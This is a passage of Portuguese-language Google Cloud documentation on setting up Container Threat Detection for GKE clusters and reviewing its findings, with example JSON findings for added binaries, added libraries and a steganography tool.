Use a Deteção de ameaças de contentores

Esta página mostra como rever as conclusões da Deteção de ameaças de contentores na Google Cloud consola e inclui exemplos de conclusões da Deteção de ameaças de contentores.

A Deteção de ameaças de contentores é um serviço integrado dos níveis Premium e Enterprise do Security Command Center.

Para ver os resultados da Deteção de ameaças de contentores, o serviço tem de estar ativado nas definições dos Serviços do Security Command Center.

Saiba mais sobre como ver e gerir as conclusões da deteção de ameaças de contentores em Rever conclusões nesta página.

Para ativar a Deteção de ameaças de contentores e outros detetores de nível Premium ao nível do projeto, consulte o artigo Ative o Security Command Center para um projeto. O nível empresarial não suporta ativações ao nível do projeto.

Usar uma versão do GKE suportada

Para detetar potenciais ameaças aos seus contentores, certifique-se de que os seus clusters estão numa versão suportada do Google Kubernetes Engine (GKE). A Deteção de ameaças de contentores suporta as seguintes versões do GKE para clusters x86 baseados no SO otimizado para contentores nos canais estável, normal e rápido:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard e Autopilot >= 1.22
  • GKE Standard e Autopilot >= 1.23

A Deteção de ameaças de contentores suporta as seguintes versões do GKE para clusters x86 baseados no Ubuntu nos canais estável, normal e rápido:

  • GKE Standard e Autopilot >= 1.28.15-gke.1480000
  • GKE Standard e Autopilot >= 1.29.12-gke.1120000
  • GKE Standard e Autopilot >= 1.30.8-gke.1128000
  • GKE Standard e Autopilot >= 1.31.4-gke.1177000
  • GKE Standard e Autopilot >= 1.32

A Deteção de ameaças de contentores suporta as seguintes versões do GKE para clusters Arm baseados no SO otimizado para contentores nos canais estável, normal e rápido:

  • GKE Standard e Autopilot >= 1.28

Os detetores de monitorização de ficheiros da Deteção de ameaças de contentores (pré-visualização) são suportados nas seguintes versões do GKE para nós baseados no SO otimizado para contentores, tanto x86 como Arm:

  • GKE Standard e Autopilot >= 1.30

Os detetores de monitorização de ficheiros da Deteção de ameaças de contentores (pré-visualização) também são suportados nas seguintes versões do GKE para nós x86 baseados no Ubuntu:

  • GKE Standard e Autopilot >= 1.32

Ativar a deteção de ameaças de contentores

Quando ativa o nível Premium ou Enterprise do Security Command Center, a deteção de ameaças de contentores é ativada por predefinição, a menos que opte por desativá-la durante o processo de ativação.

Se precisar de ativar ou desativar a Deteção de ameaças de contentores para a sua organização ou projeto, pode fazê-lo na página Definições do Security Command Center. Para mais informações, consulte o artigo Ative ou desative um serviço integrado.

Quando ativa a Deteção de ameaças de contentores, ativando o Security Command Center ou mais tarde, faça o seguinte:

  1. Para todos os clusters que não estejam numa versão suportada do GKE, conclua os passos no guia para atualizar um cluster.
  2. Certifique-se de que os seus clusters têm recursos suficientes disponíveis para executar o DaemonSet de deteção de ameaças de contentores.
  3. Na Google Cloud consola, reveja as definições de ativação do serviço de deteção de ameaças de contentores para garantir que a deteção de ameaças de contentores está ativada para os seus clusters.

Autorizações de IAM necessárias

A Deteção de ameaças de contentores requer autorização para se ativar e desativar, e gerir o agente de Deteção de ameaças de contentores em clusters do GKE.

Para conceder a autorização necessária, a função do IAM Agente de serviço de deteção de ameaças de contentores (roles/containerthreatdetection.serviceAgent) tem de ser concedida ao agente de serviço de deteção de ameaças de contentores, que é um tipo de conta de serviço.

A remoção desta função predefinida do agente do serviço pode impedir o funcionamento correto da Deteção de ameaças de contentores.

Consoante a forma e a altura em que o Security Command Center foi ativado, o nome do agente do serviço usado pela Deteção de ameaças de contentores é diferente:

  • Se o Security Command Center foi ativado antes de 7 de dezembro de 2023, a deteção de ameaças de contentores usa o seguinte agente de serviço gerido pelo utilizador:

    service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.com

  • Se o Security Command Center foi ativado ao nível da organização após 7 de dezembro de 2023, a Deteção de ameaças de contentores usa o seguinte agente de serviço ao nível da organização gerido pelo utilizador:

    service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

  • Se o Security Command Center foi ativado ao nível do projeto após 7 de dezembro de 2023, a Deteção de ameaças de contentores usa o seguinte agente de serviço ao nível da organização gerido pelo utilizador:

    service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

Para mais informações sobre agentes de serviço e funções de IAM, consulte o seguinte:

Autorizações necessárias para a conta de serviço do nó do GKE personalizada

Quando usa uma conta de serviço personalizada para os seus nós do GKE, a nova conta de serviço do nó precisa de autorizações para interagir com a Deteção de ameaças de contentores. Para conceder estas autorizações à conta de serviço, atribua-lhe a função de criador de tokens de conta de serviço (roles/iam.serviceAccountTokenCreator).

  1. Conceda a função de criador de tokens de conta de serviço à conta de serviço do nó:

    gcloud iam service-accounts add-iam-policy-binding \   SERVICE_ACCOUNT_NAME \   --member=serviceAccount:service-PROJECT_NUMBER@compute-system.iam.gserviceaccount.com \   --role=roles/iam.serviceAccountTokenCreator 

    Substitua os seguintes valores:

    • Substitua SERVICE_ACCOUNT_NAME pelo endereço de email da sua nova conta de serviço do nó.
    • Substitua PROJECT_NUMBER pelo número do projeto onde a Deteção de ameaças de contentores está implementada. Isto é fundamental se for diferente do projeto da conta de serviço.
  2. Ative a API Container Threat Detection no mesmo projeto onde foi criada a nova conta de serviço do nó:

    gcloud services enable containerthreatdetection.googleapis.com --project PROJECT_ID 

    Substitua PROJECT_ID pelo ID do projeto onde reside a nova conta de serviço do nó.

A verificar a configuração do cluster do GKE

Para que a Deteção de ameaças de contentores funcione, se o cluster estiver numa nuvem virtual privada (VPC), a respetiva rede tem de cumprir os requisitos de encaminhamento, firewall e DNS para comunicar com as APIs e os serviços Google. Para aceder às APIs Google, reveja os seguintes guias:

Além disso, a configuração do cluster do GKE ou as restrições da política da organização não podem bloquear a criação nem a utilização de objetos que a Deteção de ameaças de contentores necessita para funcionar. As secções seguintes incluem uma lista de objetos do GKE que a Deteção de ameaças de contentores cria e explicam como configurar os componentes essenciais do GKE para funcionar com a Deteção de ameaças de contentores.

Objetos do Kubernetes

Após a integração, a Deteção de ameaças de contentores cria vários objetos do GKE nos clusters ativados. Os objetos são usados para monitorizar imagens de contentores, gerir contentores e pods privilegiados e avaliar o estado para gerar resultados. A tabela seguinte apresenta os objetos, as respetivas propriedades e as funções essenciais.

Objeto Nome1 Propriedades Função
ClusterRole container-watcher-pod-reader Concede autorizações de get, watch e list em agrupamentos
ClusterRole pod-reader Concede autorizações de get, watch e list em agrupamentos
ClusterRoleBinding

container-watcher-pod-reader

gce:podsecuritypolicy:container-watcher

Concede as funções container-watcher-pod-reader e gce:podsecuritypolicy:privileged a container-watcher-pod-reader ServiceAccount
CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com Relatórios do estado do DaemonSet
DaemonSet container-watcher2 Privilegiado Interações com o módulo de kernel baseado em eBPF e o motor de contentores
Monta /host/ como leitura e escrita Comunicação com o módulo de kernel baseado em eBPF
Monta /etc/container-watcher/secrets como só de leitura para aceder a container-watcher-token Autenticação
Usa hostNetwork Geração de resultados
Imagem
gke.gcr.io/watcher-daemonset
Ativação e atualização
Backend
containerthreatdetection-REGION.googleapis.com:443
Geração de resultados
Função container-watcher-status-reporter Função com os verbos get, list, watch, create, update e patch para o CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com Permite a atualização das informações de estado do DaemonSet
RoleBinding gce:podsecuritypolicy:container-watcher Concede a função de gce:podsecuritypolicy:privileged a container-watcher-pod-reader ServiceAccount Preserva a funcionalidade quando a opção PodSecurityPolicy está ativada
container-watcher-status-reporter Concede a função de container-watcher-status-reporter a container-watcher-pod-reader ServiceAccount
Secreto container-watcher-token Autenticação
ServiceAccount container-watcher-pod-reader Ativação, atualização e desativação

1 Todos os objetos estão no espaço de nomes kube-system, exceto container-watcher-pod-reader e gce:podsecuritypolicy:container-watcher.

2 Durante a instalação, a atualização ou a remoção da Deteção de ameaças de contentores, o Kubernetes pode gerar mensagens de erro para objetos do Kubernetes ou outras dependências que estejam momentaneamente em falta ou incompletas. Por exemplo, pode haver uma instância em que a função container-watcher-pod-reader esteja em falta, o que impede a instalação do observador de pods. Isto também gera registos de erros, como serviceaccount "container-watcher-pod-reader" not found. Normalmente, estes erros resolvem-se automaticamente depois de a deteção de ameaças de contentores concluir o processo. A menos que os erros persistam durante mais de alguns minutos, podem ser ignorados em segurança.

PodSecurityPolicy e controladores de admissão

Uma PodSecurityPolicy é um recurso de controlador de admissão que configura e que valida pedidos de criação e atualização de pods no seu cluster. A Deteção de ameaças de contentores é compatível com as PodSecurityPolicies que são aplicadas automaticamente quando cria ou atualiza um cluster com a flag enable-pod-security-policy. Em concreto, a Deteção de ameaças de contentores usa a política gce.privileged quando a PodSecurityPolicy está ativada.

Se usar PodSecurityPolicies personalizadas ou outros controladores de admissão, estes não podem bloquear a criação nem a utilização de objetos de que a deteção de ameaças de contentores precisa para funcionar. Por exemplo, um controlador de admissão baseado em webhook que rejeita ou substitui implementações privilegiadas pode impedir o funcionamento correto da Deteção de ameaças de contentores.

Para mais informações, consulte o artigo Usar PodSecurityPolicies.

Excluir variáveis de ambiente das conclusões da Deteção de ameaças de contentores

Por predefinição, quando a Deteção de ameaças de contentores gera uma descoberta, comunica as variáveis de ambiente para todos os processos referenciados na descoberta. Os valores das variáveis de ambiente podem ser importantes ao investigar um ataque. No entanto, alguns pacotes de software armazenam segredos e outras informações confidenciais em variáveis de ambiente. Para impedir que a Deteção de ameaças de contentores inclua variáveis de ambiente de processos em qualquer resultado da Deteção de ameaças de contentores, desative o módulo REPORT_ENVIRONMENT_VARIABLES através da CLI Google Cloud ou do método securityCenterServices.patch da API Google Cloud Security Command Center Management ao nível da organização, da pasta ou do projeto.

Por exemplo, para desativar os relatórios de variáveis de ambiente num projeto, crie um ficheiro denominado module_config.yaml com o seguinte conteúdo:

REPORT_ENVIRONMENT_VARIABLES:   intendedEnablementState: DISABLED 

Em seguida, execute o seguinte comando:

gcloud scc manage services update container-threat-detection \     --module-config-file=module_config.yaml \     --project=PROJECT_ID 

Para restaurar o comportamento predefinido, edite module_config.yaml para que contenha o seguinte e, em seguida, execute o comando novamente:

REPORT_ENVIRONMENT_VARIABLES:   intendedEnablementState: ENABLED 

Para ver todos os comandos da CLI gcloud para gerir serviços, consulte gcloud scc manage services.

Excluir argumentos da CLI das conclusões da Deteção de ameaças de contentores

Todos os processos têm um ou mais argumentos de linha de comandos (CLI). Por predefinição, quando a Deteção de ameaças de contentores inclui detalhes do processo numa descoberta, regista os argumentos da CLI do processo. Os valores dos argumentos da CLI podem ser importantes quando investiga um ataque. No entanto, alguns utilizadores podem transmitir segredos e outras informações confidenciais em argumentos da CLI. Para impedir que a Deteção de ameaças de contentores inclua argumentos da CLI de processos em qualquer resultado da Deteção de ameaças de contentores, desative o módulo REPORT_CLI_ARGUMENTS através da CLI Google Cloud ou do método securityCenterServices.patch da API Google Cloud Security Command Center Management ao nível da organização, da pasta ou do projeto.

Por exemplo, para desativar os relatórios de argumentos da CLI num projeto, crie um ficheiro com o nome module_config.yaml com o seguinte conteúdo:

REPORT_CLI_ARGUMENTS:   intendedEnablementState: DISABLED 

Em seguida, execute o seguinte comando:

gcloud scc manage services update container-threat-detection \     --module-config-file=module_config.yaml \     --project=PROJECT_ID 

Para restaurar o comportamento predefinido, edite module_config.yaml para que contenha o seguinte e, em seguida, execute o comando novamente:

REPORT_CLI_ARGUMENTS:   intendedEnablementState: ENABLED 

Para ver todos os comandos da CLI gcloud para gerir serviços, consulte gcloud scc manage services.

Utilização de recursos

A Deteção de ameaças de contentores foi concebida para não ser intrusiva nos seus clusters e espera-se que tenha um impacto negligenciável no desempenho das operações do cluster.

A sua utilização de recursos depende da sua carga de trabalho. No entanto, os componentes principais da deteção de ameaças de contentores, o DaemonSet do espaço do utilizador e os respetivos programas eBPF, têm um impacto no desempenho estimado de um máximo de 0,125 vCPU e 450 MB de memória, com base nos limites rígidos definidos para restringir a utilização de recursos. Reavaliamos ocasionalmente estes limites e podemos alterá-los no futuro para otimizar o desempenho, especialmente para nós muito grandes.

Se for cliente do BigQuery, pode ativar a medição da utilização do GKE para monitorizar a utilização de recursos do DaemonSet do espaço do utilizador da Deteção de ameaças de contentores. Para ver o DaemonSet do espaço do utilizador na medição da utilização, pesquise o namespace kube-system e a etiqueta k8s-app=container-watcher.

A medição de utilização do GKE não consegue acompanhar a utilização da CPU do kernel especificamente para o módulo do kernel baseado em eBPF. Esses dados estão incluídos na utilização geral da CPU.

API Container Threat Detection

A Deteção de ameaças de contentores ativa automaticamente a API containerthreatdetection durante a integração para permitir a geração de resultados. Não deve interagir diretamente com esta API obrigatória. A desativação desta API prejudica a capacidade da Deteção de ameaças de contentores de gerar novas conclusões. Se quiser deixar de receber resultados da Deteção de ameaças de contentores, desative a Deteção de ameaças de contentores nas definições dos Serviços do Security Command Center.

Rever conclusões

Quando a Deteção de ameaças de contentores gera resultados, pode vê-los no Security Command Center. Se configurou exportações de registos para o Cloud Logging, também pode ver as conclusões no Cloud Logging. Para gerar uma descoberta e validar a sua configuração, pode acionar intencionalmente um detetor e testar a Deteção de ameaças de contentores.

A Deteção de ameaças de contentores tem as seguintes latências:

  • Latência de ativação de 3,5 horas para organizações ou projetos recém-integrados.
  • Latência de ativação de minutos para clusters recém-criados.
  • Latência de deteção de minutos para ameaças em clusters que foram ativados.

Reveja as conclusões na Google Cloud consola

As funções do IAM para o Security Command Center podem ser concedidas ao nível da organização, da pasta ou do projeto. A sua capacidade de ver, editar, criar ou atualizar resultados, recursos e origens de segurança depende do nível para o qual lhe é concedido acesso. Para saber mais sobre as funções do Security Command Center, consulte o artigo Controlo de acesso.

Para rever as conclusões da Deteção de ameaças de contentores no Security Command Center, siga estes passos.

  1. Na Google Cloud consola, aceda à página Resultados do Centro de comando de segurança.

    Aceda a Conclusões

  2. Selecione o seu Google Cloud projeto ou organização.
  3. Na secção Filtros rápidos, na subsecção Nome a apresentar da origem, selecione Deteção de ameaças de contentores. Os resultados da consulta de conclusões são atualizados para mostrar apenas as conclusões desta origem.
  4. Para ver os detalhes de uma descoberta específica, clique no nome da descoberta na coluna Categoria. O painel de detalhes da descoberta é aberto e apresenta o separador Resumo.
  5. No separador Resumo, reveja os detalhes da descoberta, incluindo informações sobre o que foi detetado, o recurso afetado e, se disponíveis, os passos que pode seguir para corrigir a descoberta.
  6. Opcional: para ver a definição JSON completa da descoberta, clique no separador JSON.

Para ajudar na sua investigação, as conclusões de ameaças também contêm links para os seguintes recursos externos:

  • Entradas da framework MITRE ATT&CK. A estrutura explica as técnicas de ataques contra recursos na nuvem e fornece orientações de remediação.
  • VirusTotal, um serviço pertencente à Alphabet que fornece contexto sobre ficheiros, scripts, URLs e domínios potencialmente maliciosos.

Para ver uma lista das conclusões da Deteção de ameaças de contentores, consulte os detetores da Deteção de ameaças de contentores.

Visualizar resultados no Cloud Logging

Para ver as conclusões da Deteção de ameaças de contentores no Cloud Logging, faça o seguinte:

  1. Aceda ao Explorador de registos na Google Cloud consola.

    Aceda ao Explorador de registos

  2. Selecione o Google Cloud projeto ou outro Google Cloud recurso onde está a armazenar os registos da Deteção de ameaças de eventos.

  3. Use o painel Consulta para criar a consulta de uma das seguintes formas:

    • Na lista Todos os recursos, faça o seguinte:
      1. Selecione Detector de ameaças para apresentar uma lista de todos os detetores.
      2. Para ver as deteções de todos os detetores, selecione all detector_name. Para ver as conclusões de um detetor específico, selecione o respetivo nome.
      3. Clique em Aplicar. A tabela Resultados da consulta é atualizada com os registos que selecionou.
    • Introduza a seguinte consulta no editor de consultas e clique em Executar consulta:

      resource.type="threat_detector"

      A tabela Resultados da consulta é atualizada com os registos que selecionou.

  4. Para ver um registo, selecione uma linha da tabela e, de seguida, clique em Expandir campos aninhados.

Pode criar consultas de registo avançadas para especificar um conjunto de entradas de registo de qualquer número de registos.

Exemplo de formatos de localização

Esta secção apresenta exemplos de resultados JSON para as deteções de ameaças de contentores. Vê este resultado quando exporta descobertas através da Google Cloud consola ou lista descobertas através da API Security Command Center ou da CLI Google Cloud.

Os exemplos nesta página mostram diferentes tipos de conclusões. Cada exemplo inclui apenas os campos mais relevantes para esse tipo de descoberta. Para ver uma lista completa dos campos disponíveis numa descoberta, consulte a documentação da API Security Command Center para o recurso Finding.

As informações do Kubernetes e do containerd são fornecidas com base no melhor esforço.

Added Binary Executed

{   "finding": {     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "state": "ACTIVE",     "category": "Added Binary Executed",     "sourceProperties": {       "VM_Instance_Name": "INSTANCE_ID",       "Added_Binary_Kind": "Added",       "Container_Image_Id": "CONTAINER_IMAGE_ID",       "Container_Name": "CONTAINER_NAME",       "Parent_Pid": 1.0,       "Container_Image_Uri": "CONTAINER_IMAGE_URI",       "Process_Creation_Timestamp": {         "seconds": 1.617989997E9,         "nanos": 1.17396995E8       },       "Pid": 53.0,       "Pod_Namespace": "default",       "Process_Binary_Fullpath": "BINARY_PATH",       "Process_Arguments": ["BINARY_PATH"],       "Pod_Name": "POD_NAME",       "description": "A binary that was not part of the original container image       was executed. If an added binary is executed by an attacker, this is a       possible sign that an attacker has control of the workload and they are       executing arbitrary commands.",       "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",       "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-       test-4af235e12be6f9d9", "HOME\u003d/root",       "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",       "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",       "KUBERNETES_PORT_443_TCP_PORT\u003d443",       "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",       "DEBIAN_FRONTEND\u003dnoninteractive",       "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",       "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",       "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],       "Container_Creation_Timestamp": {         "seconds": 1.617989918E9,         "nanos": 0.0       }     },     "securityMarks": {       "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"     },     "eventTime": "2021-04-09T17:39:57.527Z",     "createTime": "2021-04-09T17:39:57.625Z",     "propertyDataTypes": {       "Container_Image_Id": {         "primitiveDataType": "STRING"       },       "Pod_Namespace": {         "primitiveDataType": "STRING"       },       "Container_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Environment_Variables": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "Added_Binary_Kind": {         "primitiveDataType": "STRING"       },       "description": {         "primitiveDataType": "STRING"       },       "Pid": {         "primitiveDataType": "NUMBER"       },       "Process_Arguments": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "Container_Image_Uri": {         "primitiveDataType": "STRING"       },       "Pod_Name": {         "primitiveDataType": "STRING"       },       "Process_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Parent_Pid": {         "primitiveDataType": "NUMBER"       },       "VM_Instance_Name": {         "primitiveDataType": "STRING"       },       "Container_Name": {         "primitiveDataType": "STRING"       },       "Process_Binary_Fullpath": {         "primitiveDataType": "STRING"       }     },     "severity": "LOW",     "workflowState": "NEW",     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "projectDisplayName": "PROJECT_ID",     "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parentDisplayName": "PROJECT_ID",     "type": "google.container.Cluster"   } }     

Biblioteca adicionada carregada

{   "finding": {     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "state": "ACTIVE",     "category": "Added Library Loaded",     "sourceProperties": {       "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],       "Parent_Pid": 1.0,       "Container_Name": "CONTAINER_NAME",       "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",       "Container_Image_Id": "CONTAINER_IMAGE_ID",       "Container_Creation_Timestamp": {         "seconds": 1.618004144E9,         "nanos": 0.0       },       "Pod_Name": "POD_NAME",       "Pid": 7.0,       "description": "A library that was not part of the original container       image was loaded. If an added library is loaded, this is a possible sign       that an attacker has control of the workload and they are executing       arbitrary code.",       "VM_Instance_Name": "INSTANCE_ID",       "Pod_Namespace": "default",       "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",       "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-       library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",       "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",       "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",       "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p       ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"       , "KUBERNETES_PORT_443_TCP_PORT\u003d443",       "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",       "DEBIAN_FRONTEND\u003dnoninteractive",       "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",       "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",       "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],       "Process_Binary_Fullpath": "BINARY_PATH",       "Added_Library_Kind": "Added",       "Container_Image_Uri": "CONTAINER_IMAGE_uri"     },     "securityMarks": {       "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"     },     "eventTime": "2021-04-09T21:36:13.069Z",     "createTime": "2021-04-09T21:36:13.267Z",     "propertyDataTypes": {       "Container_Image_Id": {         "primitiveDataType": "STRING"       },       "Added_Library_Fullpath": {         "primitiveDataType": "STRING"       },       "Container_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Pod_Namespace": {         "primitiveDataType": "STRING"       },       "Environment_Variables": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "description": {         "primitiveDataType": "STRING"       },       "Process_Arguments": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "Pid": {         "primitiveDataType": "NUMBER"       },       "Container_Image_Uri": {         "primitiveDataType": "STRING"       },       "Pod_Name": {         "primitiveDataType": "STRING"       },       "Added_Library_Kind": {         "primitiveDataType": "STRING"       },       "Parent_Pid": {         "primitiveDataType": "NUMBER"       },       "VM_Instance_Name": {         "primitiveDataType": "STRING"       },       "Container_Name": {         "primitiveDataType": "STRING"       },       "Process_Binary_Fullpath": {         "primitiveDataType": "STRING"       }     },     "severity": "LOW",     "workflowState": "NEW",     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "projectDisplayName": "PROJECT_ID",     "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parentDisplayName": "PROJECT_ID",     "type": "google.container.Cluster"   } }   

Comando e controlo: ferramenta de esteganografia detetada (pré-visualização)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Command and Control: Steganography Tool Detected",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "COMMAND_AND_CONTROL",       "primaryTechniques": [         "DATA_OBFUSCATION"       ],       "additionalTactics": [         "DEFENSE_EVASION"       ],       "additionalTechniques": [         "OBFUSCATED_FILES_OR_INFO"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-steganography-tool-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     